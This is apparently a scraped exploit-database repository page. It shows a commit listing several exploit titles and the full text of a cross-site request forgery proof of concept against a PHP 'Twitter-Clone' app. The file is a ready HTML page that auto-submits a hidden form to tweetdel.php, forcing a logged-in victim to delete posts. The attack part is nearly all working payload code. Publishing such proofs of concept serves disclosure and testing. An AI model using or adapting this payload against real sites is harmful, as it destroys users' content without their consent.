8750f2fdd7
6 changes to exploits/shellcodes Project64 2.3.2 - Denial Of Service (PoC) Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution OpenSSH 7.7 - Username Enumeration WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Twitter-Clone 1 - 'userid' SQL Injection Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit) Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post) Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection
29 lines
No EOL
741 B
Text
29 lines
No EOL
741 B
Text
# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
|
|
# Date: 2018-08-21
|
|
# Exploit Author: L0RD
|
|
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
|
|
# Version: 1
|
|
# CVE: N/A
|
|
# Tested on: Win 10
|
|
|
|
# Description :
|
|
# An issue was discovered in Twitter-Clone 1 which allows a remote
|
|
# attacker to force any victim to delete posts.
|
|
|
|
# POC :
|
|
# Delete posts exploit :
|
|
|
|
<html>
|
|
<head>
|
|
<title>POC</title>
|
|
</head>
|
|
<body>
|
|
<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set
|
|
tweet id here of any post' method='post'>
|
|
<input type='hidden' name='id' value='set tweet id here of any post' />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |